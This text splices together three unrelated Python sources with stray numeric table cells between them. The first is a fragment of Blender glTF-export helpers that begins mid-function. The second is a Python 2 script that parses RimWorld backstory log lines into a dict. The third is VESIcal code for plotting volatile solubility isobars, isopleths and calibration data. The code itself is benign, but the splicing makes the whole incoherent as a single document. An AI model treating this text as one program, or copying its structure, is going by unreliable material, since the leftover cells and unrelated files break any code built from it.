                    if matNodeUseTangents(bl_node):
                        return True

        # HACK: in most cases this one indicates that object linking is used
        # disable tangent optimizations for such cases
        elif mat == None:
            return True

    return False
def matNodeUseTangents(bl_node):
    """True when the given shader node requires mesh tangents:
    a Normal Map node, a UV-map Tangent node, or a Geometry node whose
    Tangent output is connected."""
    if isinstance(bl_node, bpy.types.ShaderNodeNormalMap):
        return True

    if (isinstance(bl_node, bpy.types.ShaderNodeTangent)
            and bl_node.direction_type == 'UV_MAP'):
        return True

    if isinstance(bl_node, bpy.types.ShaderNodeNewGeometry):
        for out in bl_node.outputs:
            if out.identifier == 'Tangent' and out.is_linked:
                return True

    return False
def extractMaterialNodeTrees(node_tree):
    """Flatten a material node tree and all nested group node trees into a
    list (the given tree first).

    NOTE: located here since it's needed for meshMaterialsUseTangents()."""
    out = [node_tree]

    for bl_node in node_tree.nodes:
        # recurse into node groups, which embed their own tree
        if isinstance(bl_node, bpy.types.ShaderNodeGroup):
            out += extractMaterialNodeTrees(bl_node.node_tree)

    return out
def meshHasNgons(mesh):
    """True when any polygon has more than four corners (an n-gon)."""
    return any(poly.loop_total > 4 for poly in mesh.polygons)
def modifierNeedsExport(mod):
    """
    Whether a modifier should be applied before export. Excluded are:
        - modifiers hidden during render (a way to disable their export)
        - ARMATURE modifiers (used separately via skinning)
    """
    if not mod.show_render:
        return False
    return mod.type != 'ARMATURE'
def getSocketDefvalCompat(socket, RGBAToRGB=False, isOSL=False):
    """
    Get the default value of input/output sockets in some compatible form.
    Vector types such as bpy_prop_aray, Vector, Euler, etc... are converted
    to lists, primitive types are converted to int/float.

    :param RGBAToRGB: drop the alpha channel of RGBA sockets
    :param isOSL: emit STRING defaults as OSL string constants
    """
    sock_type = socket.type

    if sock_type in ('VALUE', 'INT'):
        return socket.default_value
    if sock_type == 'BOOLEAN':
        return int(socket.default_value)
    if sock_type == 'VECTOR':
        return list(socket.default_value)
    if sock_type == 'RGBA':
        channels = list(socket.default_value)
        return channels[0:3] if RGBAToRGB else channels
    if sock_type == 'SHADER':
        # shader sockets have no default value
        return [0, 0, 0, 0]
    if sock_type == 'STRING' and isOSL:
        # for now used for OSL only
        return pyosl.glslgen.string_to_osl_const(socket.default_value)

    # 'CUSTOM' and anything unknown are not supported
    return 0
def createCustomProperty(bl_element):
    """
    Filters and creates a custom property, which is stored in the glTF
    extra field. Returns a dict of exportable properties or None when
    there is nothing to export.
    """
    if not bl_element:
        return None

    # Custom properties, which are in most cases present and should not be exported.
    skipped = ('cycles', 'cycles_visibility', 'cycles_curves', '_RNA_UI', 'v3d')

    props = {}
    for prop_name in bl_element.keys():
        if prop_name in skipped:
            continue

        value = bl_element[prop_name]
        if hasattr(value, "to_list"):
            # IDPropertyArray and friends become plain lists
            props[prop_name] = value.to_list()
        elif isinstance(value, (str, int, float)):
            props[prop_name] = value
        # any other type is silently skipped

    return props or None
def calcLightThresholdDist(bl_light, threshold):
    """Calculate the light attenuation distance from the given threshold.
    The light power at this distance equals the threshold value.
    """
    brightest_channel = max(bl_light.color.r, bl_light.color.g, bl_light.color.b)
    power = (brightest_channel
             * max(1, bl_light.specular_factor)
             * abs(bl_light.energy / 100))
    # clamp both operands away from zero to keep sqrt well-defined
    return math.sqrt(max(1e-16, power / max(threshold, 1e-16)))
| 15,176 | 4,979 |
#!/usr/bin/python
# Look at the story mappings from rimworld.log
# cat rimworld.log | grep backstory | sort -u > stories.txt
# RimWorld handles the mappings, but pollutes its log when it does so.
# Parse the sorted backstory lines and emit a Python dict literal mapping
# backstory ids to names. (Python 2 print-statement syntax.)
f = open( 'stories.txt' )
print 'mappings = {'
for l in f.readlines():
    # whitespace-separated log tokens; token 6 looks like the backstory id
    # and token 11 the assigned name — TODO confirm against a real log line.
    x = l.strip().split(' ')
    if 'Giving random' in l:
        continue
    elif 'or any close match' in l:
        # close-match entries all map to the same fallback name
        print '\t\'%s\': \'VideoGamer91\',' % ( x[6].replace( ',', '' ) )
    else:
        print '\t\'%s\': \'%s\',' % ( x[6], x[11], )
print '}'
# NOTE(review): the file handle is never closed; harmless for a one-shot
# script, but a with-block (or f.close()) would be tidier.
| 531 | 199 |
from VESIcal import core
from VESIcal import calibrations
from VESIcal.tasplot import add_LeMaitre_fields
import pandas as pd
import numpy as np
import warnings as w
import matplotlib as mpl
import matplotlib.pyplot as plt
# ---------- DEFINE CUSTOM PLOTTING FORMATTING ------------ #
style = "seaborn-colorblind"
plt.style.use(style)
plt.rcParams["mathtext.default"] = "regular"
plt.rcParams["mathtext.fontset"] = "dejavusans"
mpl.rcParams['patch.linewidth'] = 1
mpl.rcParams['axes.linewidth'] = 1
plt.rcParams['axes.titlesize'] = 20
plt.rcParams['axes.labelsize'] = 18
plt.rcParams['xtick.labelsize'] = 14
plt.rcParams['ytick.labelsize'] = 14
plt.rcParams['legend.fontsize'] = 14
mpl.rcParams['lines.markersize'] = 10

# Define color cycler based on plot style set here
# get style formatting set by plt.style.use():
the_rc = plt.style.library[style]
# list of colors by hex code (repeated 10x so long series never run out):
color_list = the_rc['axes.prop_cycle'].by_key()['color'] * 10
color_cyler = the_rc['axes.prop_cycle']  # get the cycler
# NOTE(review): 'color_cyler' looks like a typo for 'color_cycler' — it may
# be referenced elsewhere in the package, so the name is left unchanged.
# ----------- MAGMASAT PLOTTING FUNCTIONS ----------- #
def _fit_polynomial_xy(xs, ys, degree):
    """Fit a polynomial of ``degree`` through (xs, ys) and resample it.

    Returns (new_xs, new_ys) as lists of 50 evenly spaced points between
    the first and last x value. If the fit fails (e.g., too few points),
    the original data are returned unchanged as lists.
    """
    try:
        # calculate polynomial
        coeffs = np.polyfit(xs, ys, degree)
        poly = np.poly1d(coeffs)
        # calculate new x's and y's
        new_xs = np.linspace(xs[0], xs[-1], 50)
        return list(new_xs), list(poly(new_xs))
    except Exception:
        return list(xs), list(ys)


def smooth_isobars_and_isopleths(isobars=None, isopleths=None):
    """
    Takes in a dataframe with calculated isobar and isopleth information
    (e.g., output from calculate_isobars_and_isopleths) and smooths the data
    for plotting.

    Parameters
    ----------
    isobars: pandas DataFrame
        OPTIONAL. DataFrame object containing isobar information as
        calculated by calculate_isobars_and_isopleths.
    isopleths: pandas DataFrame
        OPTIONAL. DataFrame object containing isopleth information as
        calculated by calculate_isobars_and_isopleths.

    Returns
    -------
    pandas DataFrame, tuple of DataFrames, or None
        DataFrame(s) with x and y values for all isobars and/or isopleths.
        Both (isobar_df, isopleth_df) are returned when both inputs are
        given, a single DataFrame when only one is given, and None when
        neither is given. Useful if a user wishes to do custom plotting
        rather than using the built-in `plot_isobars_and_isopleths()`.
    """
    np.seterr(divide='ignore', invalid='ignore')  # turn off numpy warning
    w.filterwarnings("ignore", message="Polyfit may be poorly conditioned")

    if isobars is not None:
        P_vals = isobars.Pressure.unique()
        isobars_lists = isobars.values.tolist()
        # add zero values to volatiles list
        isobars_lists.append([0.0, 0.0, 0.0, 0.0])
        isobars_pressure = []
        isobars_H2O_liq = []
        isobars_CO2_liq = []
        # smooth each isobar with a cubic fit
        for pressure in P_vals:
            Pxs = [item[1] for item in isobars_lists if item[0] == pressure]
            Pys = [item[2] for item in isobars_lists if item[0] == pressure]
            new_xs, new_ys = _fit_polynomial_xy(Pxs, Pys, 3)
            isobars_H2O_liq += new_xs
            isobars_CO2_liq += new_ys
            isobars_pressure += [pressure] * len(new_xs)
        isobar_df = pd.DataFrame({"Pressure": isobars_pressure,
                                  "H2O_liq": isobars_H2O_liq,
                                  "CO2_liq": isobars_CO2_liq})

    if isopleths is not None:
        XH2O_vals = isopleths.XH2O_fl.unique()
        isopleths_lists = isopleths.values.tolist()
        isopleths_XH2O_fl = []
        isopleths_H2O_liq = []
        isopleths_CO2_liq = []
        # smooth each isopleth with a quadratic fit
        for Xfl in XH2O_vals:
            Xxs = [item[1] for item in isopleths_lists if item[0] == Xfl]
            Xys = [item[2] for item in isopleths_lists if item[0] == Xfl]
            new_xs, new_ys = _fit_polynomial_xy(Xxs, Xys, 2)
            isopleths_H2O_liq += new_xs
            isopleths_CO2_liq += new_ys
            isopleths_XH2O_fl += [Xfl] * len(new_xs)
        isopleth_df = pd.DataFrame({"XH2O_fl": isopleths_XH2O_fl,
                                    "H2O_liq": isopleths_H2O_liq,
                                    "CO2_liq": isopleths_CO2_liq})

    np.seterr(divide='warn', invalid='warn')  # turn numpy warning back on
    w.filterwarnings("always", message="Polyfit may be poorly conditioned")

    if isobars is not None and isopleths is not None:
        return isobar_df, isopleth_df
    if isobars is not None:
        return isobar_df
    if isopleths is not None:
        return isopleth_df
    return None  # neither input was provided
def plot(isobars=None, isopleths=None, degassing_paths=None, custom_H2O=None,
         custom_CO2=None, isobar_labels=None, isopleth_labels=None,
         degassing_path_labels=None, custom_labels=None,
         custom_colors="VESIcal", custom_symbols=None, markersize=10,
         figsize=(12, 8), save_fig=False, extend_isobars_to_zero=True,
         smooth_isobars=False, smooth_isopleths=False, **kwargs):
    """
    Custom automatic plotting of model calculations in VESIcal.

    Any combination of isobars, isopleths, degassing paths, and custom data
    points can be plotted on an H2O-CO2 (wt%) diagram, with optional labels
    for each plotted element.

    Parameters
    ----------
    isobars: pandas DataFrame or list
        OPTIONAL. Isobar data as calculated by
        calculate_isobars_and_isopleths, or a list of such DataFrames.
    isopleths: pandas DataFrame or list
        OPTIONAL. Isopleth data as calculated by
        calculate_isobars_and_isopleths, or a list of such DataFrames.
    degassing_paths: list
        OPTIONAL. List of DataFrames with degassing information as
        generated by calculate_degassing_path().
    custom_H2O: list
        OPTIONAL. List of groups of H2O values to plot as points. Must be
        passed with custom_CO2 and be the same length as custom_CO2.
    custom_CO2: list
        OPTIONAL. List of groups of CO2 values to plot as points. Must be
        passed with custom_H2O and be the same length as custom_H2O.
    isobar_labels: list
        OPTIONAL. Legend labels, one per set of isobars. Default None gives
        generic "Isobars n" labels with pressures in parentheses.
    isopleth_labels: list
        OPTIONAL. Legend labels, one per set of isopleths. Default None
        gives generic "Isopleth n" labels with XH2O values in parentheses.
    degassing_path_labels: list
        OPTIONAL. Legend labels, one per degassing path. Default None gives
        generic "Pathn" labels.
    custom_labels: list
        OPTIONAL. Legend labels, one per group of custom points. Default
        None gives generic "Customn" labels.
    custom_colors: list
        OPTIONAL. Default "VESIcal" uses VESIcal's color ramp. Otherwise a
        list of matplotlib-readable colors, same length as custom_H2O.
    custom_symbols: list
        OPTIONAL. Default None plots filled circles. Otherwise a list of
        matplotlib marker styles, same length as custom_H2O.
    markersize: int
        OPTIONAL. Default 10. Marker size for (custom_H2O, custom_CO2)
        points, as the matplotlib markersize kwarg.
    figsize: tuple
        OPTIONAL. Default (12, 8). Matplotlib figsize as
        (x_dimension, y_dimension).
    save_fig: False or str
        OPTIONAL. Default False. If a string is passed, the figure is saved
        with that string as the filename (extension included).
    extend_isobars_to_zero: bool
        OPTIONAL. If True (default), isobars will be extended to zero, even
        if there is a finite solubility at zero partial pressure.
    smooth_isobars: bool
        OPTIONAL. Default False. If True, isobar data is fit to a
        polynomial before plotting; if False, the raw data is plotted.
    smooth_isopleths: bool
        OPTIONAL. Default False. If True, isopleth data is fit to a
        polynomial before plotting; if False, the raw data is plotted.

    Returns
    -------
    fig, axes Matplotlib objects
        Plot with H2O wt% in the melt on the x-axis and CO2 wt% in the melt
        on the y-axis. Isobars, isopleths, degassing paths, and custom data
        are drawn if passed.
    """
    # Turn off warnings:
    np.seterr(divide='ignore', invalid='ignore')  # turn off numpy warning
    w.filterwarnings("ignore", message="Polyfit may be poorly conditioned")

    def check_inputs(custom_H2O, custom_CO2):
        # custom H2O/CO2 must come as a matched, equal-length pair
        if custom_H2O is not None:
            if custom_CO2 is None:
                raise core.InputError("If x data is passed, y data must also "
                                      "be passed.")
            else:
                if len(custom_H2O) == len(custom_CO2):
                    pass
                else:
                    raise core.InputError("x and y data must be same length")
        if custom_CO2 is not None:
            if custom_H2O is None:
                raise core.InputError("If y data is passed, x data must also "
                                      "be passed.")

    def check_colors(custom_colors):
        # resolve the color ramp used for custom data points
        if custom_colors == "VESIcal":
            use_colors = color_list
        elif isinstance(custom_colors, list):
            use_colors = custom_colors
        else:
            raise core.InputError("Argument custom_colors must be type list. "
                                  "Just passing one item? Try putting square "
                                  "brackets, [], around it.")
        return use_colors

    def calc_extend_isobars_to_zero(Pxs, Pys):
        """
        Calculates new end-points for plotting isobars when
        extend_isobars_to_zero option is set to True.

        Parameters
        ----------
        Pxs, Pys: list
            List of x and y values corresponding to isobars.
        """
        # extend the low end of the isobar onto the nearest axis
        if Pxs[0]*Pys[0] != 0.0:
            if Pxs[0] > Pys[0]:
                # create new array of length n+1 if n is the length of the
                # original array:
                Px_new = np.zeros(np.shape(Pxs)[0]+1)
                # set the first x value in the new array equal to 0:
                Px_new[0] = 0
                # fill the rest of the new array with the original array
                # values:
                Px_new[1:] = Pxs
                # overwrite the original array with the new one:
                Pxs = Px_new

                Py_new = np.zeros(np.shape(Pys)[0]+1)
                Py_new[0] = Pys[0]
                Py_new[1:] = Pys
                Pys = Py_new
            else:
                Px_new = np.zeros(np.shape(Pxs)[0]+1)
                Px_new[0] = Pxs[0]
                Px_new[1:] = Pxs
                Pxs = Px_new

                Py_new = np.zeros(np.shape(Pys)[0]+1)
                Py_new[0] = 0
                Py_new[1:] = Pys
                Pys = Py_new

        # extend the high end of the isobar onto the nearest axis
        if Pxs[-1]*Pys[-1] != 0.0:
            if Pxs[-1] < Pys[-1]:
                Px_new = np.zeros(np.shape(Pxs)[0]+1)
                Px_new[-1] = 0
                Px_new[:-1] = Pxs
                Pxs = Px_new

                Py_new = np.zeros(np.shape(Pys)[0]+1)
                Py_new[-1] = Pys[-1]
                Py_new[:-1] = Pys
                Pys = Py_new
            else:
                Px_new = np.zeros(np.shape(Pxs)[0]+1)
                Px_new[-1] = Pxs[-1]
                Px_new[:-1] = Pxs
                Pxs = Px_new

                Py_new = np.zeros(np.shape(Pys)[0]+1)
                Py_new[-1] = 0
                Py_new[:-1] = Pys
                Pys = Py_new

        return Pxs, Pys

    # -------- HANDLE USER INPUT ERRORS, SET COLORS, SMOOTH LINES -------- ##
    check_inputs(custom_H2O=custom_H2O, custom_CO2=custom_CO2)
    use_colors = check_colors(custom_colors=custom_colors)
    if smooth_isobars:
        isobars = smooth_isobars_and_isopleths(isobars=isobars)
    if smooth_isopleths:
        isopleths = smooth_isobars_and_isopleths(isopleths=isopleths)

    # -------- CREATE FIGURE -------- ##
    fig, ax = plt.subplots(figsize=figsize)
    if 'custom_x' in kwargs:
        ax.set(xlabel=kwargs['xlabel'], ylabel=kwargs['ylabel'])
    else:
        ax.set(xlabel='H$_2$O wt%', ylabel='CO$_2$ wt%')
    labels = []

    # -------- PLOT ISOBARS -------- ##
    if isobars is not None:
        if isinstance(isobars, pd.DataFrame):
            isobars = [isobars]
        for i in range(len(isobars)):
            P_vals = isobars[i].Pressure.unique()
            isobars_lists = isobars[i].values.tolist()
            # add zero values to volatiles list
            isobars_lists.append([0.0, 0.0, 0.0, 0.0])
            P_iter = 0
            for pressure in P_vals:
                P_iter += 1
                Pxs = [item[1] for item in isobars_lists
                       if item[0] == pressure]
                Pys = [item[2] for item in isobars_lists
                       if item[0] == pressure]
                if extend_isobars_to_zero:
                    # keep the raw end-points if the extension fails
                    try:
                        Pxs, Pys = calc_extend_isobars_to_zero(Pxs, Pys)
                    except Exception:
                        pass
                # only the first line of each isobar set gets a legend entry
                if len(isobars) > 1:
                    if P_iter == 1:
                        P_list = [int(i) for i in P_vals]
                        if isinstance(isobar_labels, list):
                            labels.append(str(isobar_labels[i]) + ' (' +
                                          ', '.join(map(str, P_list)) +
                                          " bars)")
                        else:
                            labels.append('Isobars ' + str(i+1) + ' (' +
                                          ', '.join(map(str, P_list)) +
                                          " bars)")
                    else:
                        labels.append('_nolegend_')

                if len(isobars) > 1:
                    ax.plot(Pxs, Pys, color=color_list[i])
                else:
                    ax.plot(Pxs, Pys)
        if len(isobars) == 1:
            labels += [str(P_val) + " bars" for P_val in P_vals]

    # -------- PLOT ISOPLETHS -------- ##
    if isopleths is not None:
        if isinstance(isopleths, pd.DataFrame):
            isopleths = [isopleths]
        for i in range(len(isopleths)):
            XH2O_vals = isopleths[i].XH2O_fl.unique()
            isopleths_lists = isopleths[i].values.tolist()
            H_iter = 0
            for Xfl in XH2O_vals:
                H_iter += 1
                Xxs = [item[1] for item in isopleths_lists if item[0] == Xfl]
                Xys = [item[2] for item in isopleths_lists if item[0] == Xfl]
                # only the first line of each isopleth set gets a legend entry
                if len(isopleths) > 1:
                    if H_iter == 1:
                        H_list = [i for i in XH2O_vals]
                        if isinstance(isopleth_labels, list):
                            labels.append(str(isopleth_labels[i]) + ' (' +
                                          ', '.join(map(str, H_list)) +
                                          " XH2Ofluid)")
                        else:
                            labels.append('Isopleths ' + str(i+1) + ' (' +
                                          ', '.join(map(str, H_list)) +
                                          " XH2Ofluid)")
                    else:
                        labels.append('_nolegend_')
                    ax.plot(Xxs, Xys, ls='dashed', color=color_list[i])

                if len(isopleths) == 1:
                    H_list = [i for i in XH2O_vals]
                    if H_iter == 1:
                        labels.append('Isopleths (' +
                                      ', '.join(map(str, H_list)) +
                                      " XH2Ofluid)")
                    else:
                        labels.append('_nolegend_')
                    ax.plot(Xxs, Xys, ls='dashed', color='k')

    # -------- PLOT DEGASSING PATHS -------- ##
    if degassing_paths is not None:
        if isinstance(degassing_paths, pd.DataFrame):
            degassing_paths = [degassing_paths]

        degassing_colors = color_list.copy()
        iterno = 0
        for i in range(len(degassing_paths)):
            if degassing_path_labels is None:
                iterno += 1
                labels.append('Path%s' % iterno)
                ax.plot(degassing_paths[i]["H2O_liq"],
                        degassing_paths[i]["CO2_liq"], ls='dotted',
                        color=degassing_colors[i])
            else:
                labels.append(degassing_path_labels[iterno])
                ax.plot(degassing_paths[i]["H2O_liq"],
                        degassing_paths[i]["CO2_liq"], ls='dotted',
                        color=degassing_colors[i])
                iterno += 1

        for i in range(len(degassing_paths)):
            # mark the start (maximum volatile content) of each path
            ax.plot(degassing_paths[i]["H2O_liq"].max(),
                    degassing_paths[i]["CO2_liq"].max(), 'o',
                    color=degassing_colors[i])
            labels.append('_nolegend_')

    # -------- PLOT CUSTOM H2O-CO2 -------- ##
    if custom_H2O is not None and custom_CO2 is not None:
        if isinstance(custom_H2O, pd.DataFrame):
            custom_H2O = [custom_H2O]
        if isinstance(custom_CO2, pd.DataFrame):
            custom_CO2 = [custom_CO2]

        if custom_symbols is None:
            use_marker = ['o'] * len(custom_H2O)
        else:
            use_marker = custom_symbols

        iterno = 0
        for i in range(len(custom_H2O)):
            if custom_labels is None:
                iterno += 1
                labels.append('Custom%s' % iterno)
                ax.plot(custom_H2O[i], custom_CO2[i], use_marker[i],
                        color=use_colors[i], markersize=markersize)
            else:
                labels.append(custom_labels[iterno])
                ax.plot(custom_H2O[i], custom_CO2[i], use_marker[i],
                        color=use_colors[i], markersize=markersize)
                iterno += 1

    # -------- PLOT CUSTOM X-Y -------- ##
    if 'custom_x' in kwargs:
        custom_x = kwargs['custom_x']
        custom_y = kwargs['custom_y']
        if isinstance(custom_x, pd.core.series.Series):
            custom_x = [list(custom_x.values)]
        if isinstance(custom_y, pd.core.series.Series):
            custom_y = [list(custom_y.values)]

        if custom_symbols is None:
            use_marker = ['o'] * len(custom_x)
        else:
            use_marker = custom_symbols

        iterno = 0
        for i in range(len(custom_x)):
            if custom_labels is None:
                iterno += 1
                labels.append('Custom%s' % iterno)
                ax.plot(custom_x[i], custom_y[i], use_marker[i],
                        color=use_colors[i], markersize=markersize)
            else:
                labels.append(custom_labels[iterno])
                ax.plot(custom_x[i], custom_y[i], use_marker[i],
                        color=use_colors[i], markersize=markersize)
                iterno += 1

    # -------- PLOT LEGEND -------- ##
    ax.legend(labels, bbox_to_anchor=(1.01, 1), loc='upper left')
    if 'custom_x' not in kwargs:
        ax.set_xlim(left=0)
        ax.set_ylim(bottom=0)

    np.seterr(divide='warn', invalid='warn')  # turn numpy warning back on
    w.filterwarnings("always", message="Polyfit may be poorly conditioned")

    # -------- SAVE FIGURE IF DESIRED -------- ##
    if save_fig is not False:
        fig.savefig(save_fig)

    return fig, ax
def scatterplot(custom_x, custom_y, xlabel=None, ylabel=None, **kwargs):
    """
    Custom x-y plotting using VESIcal's built-in plot() function, built on
    Matplotlib's plot and scatter functions.

    Parameters
    ----------
    custom_x: list
        List of groups of x-values to plot as points or lines
    custom_y: list
        List of groups of y-values to plot as points or lines
    xlabel: str
        OPTIONAL. What to display along the x-axis.
    ylabel: str
        OPTIONAL. What to display along the y-axis.
    kwargs:
        Can take in any key word arguments that can be passed to `plot()`.

    Returns
    -------
    fig, ax matplotlib objects
        X-y plot with custom x and y axis values and labels.

    Raises
    ------
    core.InputError
        If x and y lists differ in length, or if a passed label is not a
        string.
    """
    # lengths can only be validated when both inputs are plain lists
    if isinstance(custom_x, list) and isinstance(custom_y, list):
        if len(custom_x) != len(custom_y):
            raise core.InputError("X and y lists must be same length")
    if xlabel is not None and not isinstance(xlabel, str):
        raise core.InputError("xlabel must be string")
    if ylabel is not None and not isinstance(ylabel, str):
        raise core.InputError("ylabel must be string")
    return plot(custom_x=custom_x, custom_y=custom_y, xlabel=xlabel,
                ylabel=ylabel, **kwargs)
# ------- Define custom plotting tools for checking calibrations ------- #
def calib_plot(user_data=None, model='all', plot_type='TAS', zoom=None,
               figsize=(17, 8), legend=True, save_fig=False, **kwargs):
    """
    Plots user data and the calibration set of any or all models on an x-y
    plot or a total alkalis vs silica (TAS) diagram. TAS diagram boundaries
    provided by tasplot python module, copyright John A Stevenson.

    Parameters
    ----------
    user_data: BatchFile object, Sample object, pandas DataFrame, pandas
        Series, or dict.
        OPTIONAL. Default None plots only the model calibration set. Oxide
        composition of one or more samples.
    model: str or list
        OPTIONAL. Default 'all' plots every model calibration dataset;
        'Mixed' (or 'mixed') plots all mixed-fluid models. A single model
        name (e.g., 'Shishkina') or a list of names may also be passed.
    plot_type: str
        OPTIONAL. Default 'TAS' (total alkali vs silica). Pass 'xy' plus
        x and y oxide names (e.g., x='SiO2', y='Al2O3') for an x-y plot.
    zoom: str or list
        OPTIONAL. Default None uses 35<x<100 and 0<y<25 wt% for TAS plots
        and autoscaled axes for xy plots. 'user_data' zooms around a single
        user sample. A list of tuples [(x_min, x_max), (y_min, y_max)] sets
        the limits manually.
    figsize: tuple
        OPTIONAL. Default (17, 8). Matplotlib figsize as
        (x_dimension, y_dimension).
    legend: bool
        OPTIONAL. Default True. Set False to hide the legend.
    save_fig: False or str
        OPTIONAL. Default False. If a string is passed, the figure is saved
        with that string as the filename (extension included).

    Returns
    -------
    matplotlib object
    """
    # Get x and y axis limits, if user passed them
    if zoom is None:
        # default window covering the whole TAS field
        user_xmin = 35
        user_xmax = 100
        user_ymin = 0
        user_ymax = 25
    elif zoom == 'user_data':
        if isinstance(user_data, pd.DataFrame):
            print("'user_data' type zoom for more than one sample is not ",
                  "implemented yet.")
            user_xmin = 35
            user_xmax = 100
            user_ymin = 0
            user_ymax = 25
        elif (isinstance(user_data, pd.core.series.Series) or
              isinstance(user_data, dict)):
            # frame the window around the single sample
            user_xmin = user_data['SiO2'] - 5
            user_xmax = user_data['SiO2'] + 5
            user_ymin = user_data['Na2O'] + user_data['K2O'] - 2
            if user_ymin < 0:
                user_ymin = 0
            user_ymax = user_data['Na2O'] + user_data['K2O'] + 2
    elif isinstance(zoom, list):
        user_xmin, user_xmax = zoom[0]
        user_ymin, user_ymax = zoom[1]
    else:
        raise core.InputError('Trying to pass zoom coords? Pass as ' +
                              '[(x, x), (y, y)]')

    # Create the figure
    fig, ax1 = plt.subplots(figsize=figsize)
    font = {'family': 'sans-serif',
            'color': 'black',
            'weight': 'normal',
            'size': 20,
            }

    # TAS figure
    if plot_type == 'TAS':
        # adjust x limits here if you want to focus on a specific part of
        # compostional space:
        ax1.set_xlim([user_xmin, user_xmax])
        # adjust y limits here
        ax1.set_ylim([user_ymin, user_ymax])
        plt.xlabel('SiO$_2$, wt%', fontdict=font, labelpad=15)
        plt.ylabel('Na$_2$O+K$_2$O, wt%', fontdict=font, labelpad=15)
        # add LeMaitre fields
        if zoom is None:
            add_LeMaitre_fields(ax1)
    elif plot_type == 'xy':
        if 'x' in kwargs and 'y' in kwargs:
            x = kwargs['x']
            y = kwargs['y']
            if zoom is not None:
                ax1.set_xlim([user_xmin, user_xmax])
                ax1.set_ylim([user_ymin, user_ymax])
            plt.xlabel(str(x)+", wt%", fontdict=font, labelpad=15)
            plt.ylabel(str(y)+", wt%", fontdict=font, labelpad=15)
        else:
            raise core.InputError("If plot_type is 'xy', then x and y "
                                  "values must be passed as strings. For "
                                  "example, x='SiO2', y='Al2O3'.")

    # Plot Calibration Data
    if model == 'all':
        model = ['MagmaSat',
                 'Shishkina',
                 'Dixon',
                 'IaconoMarziano',
                 'Liu',
                 'AllisonCarbon',
                 'MooreWater']
    # accept both spellings; the docstring advertises 'Mixed'
    if model in ('mixed', 'Mixed'):
        model = ['MagmaSat',
                 'Shishkina',
                 'Dixon',
                 'IaconoMarziano',
                 'Liu']
    if isinstance(model, str):
        model = [model]

    if isinstance(model, list):
        # set legends to false
        h2o_legend = False
        co2_h2oco2_legend = False
        # check which legends to turn to True
        for modelname in model:
            model_type = calibrations.return_calibration_type(modelname)
            if model_type['H2O']:
                h2o_legend = True
            if model_type['CO2'] or model_type['Mixed']:
                co2_h2oco2_legend = True

        if h2o_legend:
            plt.scatter([], [], marker='', label=r"$\bf{Pure \ H_2O:}$")
            for modelname in model:
                calibdata = calibrations.return_calibration(modelname)
                model_type = calibrations.return_calibration_type(modelname)
                if isinstance(calibdata, str):
                    w.warn(calibdata)
                else:
                    if model_type['H2O']:
                        if plot_type == 'TAS':
                            try:
                                plt.scatter(calibdata['H2O']['SiO2'],
                                            (calibdata['H2O']['Na2O'] +
                                             calibdata['H2O']['K2O']),
                                            marker='s', edgecolors='k',
                                            facecolors=calibdata['facecolor'],
                                            label=str(modelname))
                            except Exception:
                                plt.scatter(calibdata['H2O']['SiO2'],
                                            calibdata['H2O']['Na2O+K2O'],
                                            marker='s', edgecolors='k',
                                            facecolors=calibdata['facecolor'],
                                            label=str(modelname))
                        if plot_type == 'xy':
                            try:
                                plt.scatter(calibdata['H2O'][x],
                                            calibdata['H2O'][y],
                                            marker='s', edgecolors='k',
                                            facecolors=calibdata['facecolor'],
                                            label=str(modelname))
                            except Exception:
                                # pass a single message string; a second
                                # positional arg would be (mis)read as the
                                # warning category
                                w.warn("The requested oxides were not found "
                                       "in the calibration dataset for " +
                                       str(modelname) + ".")
            if co2_h2oco2_legend:
                plt.scatter([], [], marker='', label=r"${\ }$")

        if co2_h2oco2_legend:
            plt.scatter([], [], marker='',
                        label=r"$\bf{\ CO_2 \ and \ H_2O\!-\!CO_2:}$")
            for modelname in model:
                calibdata = calibrations.return_calibration(modelname)
                model_type = calibrations.return_calibration_type(modelname)
                if isinstance(calibdata, str):
                    w.warn(calibdata)
                else:
                    if model_type['CO2'] and model_type['Mixed']:
                        frames = [calibdata['CO2'], calibdata['Mixed']]
                        co2_and_mixed = pd.concat(frames)
                        if plot_type == 'TAS':
                            try:
                                plt.scatter(co2_and_mixed['SiO2'],
                                            (co2_and_mixed['Na2O'] +
                                             co2_and_mixed['K2O']),
                                            marker='d', edgecolors='k',
                                            facecolors=calibdata['facecolor'],
                                            label=str(modelname))
                            except Exception:
                                plt.scatter(co2_and_mixed['SiO2'],
                                            co2_and_mixed['Na2O+K2O'],
                                            marker='d', edgecolors='k',
                                            facecolors=calibdata['facecolor'],
                                            label=str(modelname))
                        if plot_type == 'xy':
                            try:
                                plt.scatter(co2_and_mixed[x], co2_and_mixed[y],
                                            marker='d', edgecolors='k',
                                            facecolors=calibdata['facecolor'],
                                            label=str(modelname))
                            except Exception:
                                w.warn("The requested oxides were not found "
                                       "in the calibration dataset for " +
                                       str(modelname) + ".")
                    elif model_type['CO2'] or model_type['Mixed']:
                        if model_type['CO2']:
                            thistype = 'CO2'
                        if model_type['Mixed']:
                            thistype = 'Mixed'
                        if plot_type == 'TAS':
                            try:
                                plt.scatter(calibdata[thistype]['SiO2'],
                                            (calibdata[thistype]['Na2O'] +
                                             calibdata[thistype]['K2O']),
                                            marker='d', edgecolors='k',
                                            facecolors=calibdata['facecolor'],
                                            label=str(modelname))
                            except Exception:
                                plt.scatter(calibdata[thistype]['SiO2'],
                                            calibdata[thistype]['Na2O+K2O'],
                                            marker='d', edgecolors='k',
                                            facecolors=calibdata['facecolor'],
                                            label=str(modelname))
                        if plot_type == 'xy':
                            try:
                                plt.scatter(calibdata[thistype][x],
                                            calibdata[thistype][y],
                                            marker='d', edgecolors='k',
                                            facecolors=calibdata['facecolor'],
                                            label=str(modelname))
                            except Exception:
                                w.warn("The requested oxides were not found "
                                       "in the calibration dataset for "
                                       + str(modelname) + ".")
    else:
        raise core.InputError("model must be of type str or list")

    # Plot user data
    if user_data is None:
        pass
    else:
        if ((user_data.__class__.__module__, user_data.__class__.__name__) ==
                ('VESIcal', 'BatchFile')):
            user_data = user_data.get_data()
            # batchfile and VESIcal (__init__) are not imported to avoid
            # circular imports
            # use above notation to interrogate datatype
        if ((user_data.__class__.__module__, user_data.__class__.__name__) ==
                ('VESIcal', 'Sample')):
            user_data = user_data.get_composition()
            # batchfile and VESIcal (__init__) are not imported to avoid
            # circular imports
            # use above notation to interrogate datatype
        if plot_type == 'TAS':
            _sample = user_data.copy()
            try:
                _sample["TotalAlkalis"] = _sample["Na2O"] + _sample["K2O"]
            except Exception:
                # without the alkali columns the scatter below cannot work,
                # so fail loudly (the error was previously created but
                # never raised)
                raise core.InputError("Na2O and K2O data must be in "
                                      "user_data")
